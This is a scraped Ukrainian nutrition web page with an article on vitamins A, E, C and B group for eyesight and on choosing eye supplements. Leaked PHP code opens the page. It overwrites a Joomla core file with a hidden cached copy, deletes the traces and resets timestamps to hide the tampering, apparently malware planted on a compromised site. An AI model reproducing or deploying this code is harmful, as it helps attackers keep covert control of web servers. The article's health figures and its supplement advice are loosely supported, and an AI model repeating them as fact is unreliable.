$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Вітаміни для очей, або як покращити зір | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Вітаміни для очей, або як покращити зір

вітаміни для очей

Факторів, які можуть викликати погіршення зору людини дуже багато. З віком відбувається зниження прозорість кришталика на 1% щорічно. А робота за комп'ютером і носіння контактних лінз ще швидше приводять до зниження зору або дискомфорту. Однак очам можна допомогти, у тому числі і за допомогою правильного харчування.

Саме незбалансоване харчування є основним чинником погіршення зору. Адже очі, які відчувають підвищене навантаження, потребують і в посиленому харчуванні, в надходженні вітамінів і мікроелементів. Це одна з найважливіших умов нормального зору.

Вітамін А

Бере участь в синтезі муцину, який сприяє підтримці нормальної вологості слизової оболонки. Саме він є основою для виробництва зорового пігменту, що дозволяє нам бачити в сутінках.

При нестачі вітаміну А слизові очі пересушується, виникає відчуття «піску в очах», знижується сутінкове зір, погіршується бічний зір.

Джерела вітаміну А - печінка, морква, гарбуз, абрикоси. Але для поповнення добової потреби кожен день необхідні 200 грамів печінки або пара кілограмів моркви.

Вітамін Е

Антиоксидант, який запобігає помутніння кришталика і віддаляє терміни появи катаракти. Цей вітамін необхідний також для запобігання дегенерації сітківки, яка виникає через дії сонячної радіації. Вітамін Е також бере участь у синтезі ферменту, який допомагає відновлювати пошкоджені клітини сітківки.

При нестачі вітаміну Е зір погіршується поступово, але швидше, ніж при повноцінному раціоні.

Джерела вітаміну Е - рослинні олії, особливо кукурудзяна, бавовняна та олія пшеничних зародків. Включивши ці масла в щоденний раціон ви можете покрити потребу організму у вітаміні Е, однак при підвищених навантаженнях на зір або при дотриманні дієти, що виключає жири - вам потрібно додаткові його прийом у капсулах.

Вітамін С

Це головний вітамін для зміцнення кровоносних судин. А повноцінне харчування та постачання киснем - це важлива умова нормальної роботи зорового аналізатора.

Вітамін С відновлює вітамін Е, який окислюється в процесі захисту клітин сітківки. Крім того, вже доведено, що люди з високим рівнем вітаміну С в крові на 70% рідше хворіють катарактою.

Джерела вітаміну С - фрукти і овочі. Цитрусові, солодкий перець, чорна смородина. Ось тільки їсти ці продукти потрібно щодня і у великих кількостях. Добову дозу вітаміну С містять 3 лимони. Так що варто приймати аскорбінки додатково, оскільки навіть інститут харчування РАМН стверджує, що потреба росіян у вітаміні С задоволена тільки на 50% в середньому.

Вітаміни групи В


Ця група вітамінів завідує обміном речовин у нервовій тканині. Їх брак веде до серйозних порушень здоров'я в цілому.

При нестачі вітаміну В2 виникають відчуття печіння або різі в очах, збільшується ризик розвитку катаракти, очі швидко втомлюються. Вітамін В12 запобігає захворювання зорового нерва і сітківки.

Вітамінів групи В багато в хлібі з борошна грубого помелу. Але їсти продукти, що містять вітаміни групи В треба в таких кількостях, що навряд чи ви зможете це зробити. Вихід - приймати вітаміни у вигляді препаратів.

Як вибрати вітаміни для очей


Не купуйтеся на рекламні обіцянки. Подивіться на склад препарату. Якщо в ньому тільки один активний компонент, а решта - це барвники або Формотворчі компоненти, цей препарат навряд чи допоможе вашому зору. Потрібні комплексні препарати, що містять всі вищевказані компоненти, а так само мікроелементи в дозуваннях, близьких до рекомендованих для вашого віку добовим нормам.

Харчуйтеся правильно і дивіться на світ ясними очима.

Наталія Розіна.


 
Харчування-здоровий спосіб життя Вітаміни для очей, або як покращити зір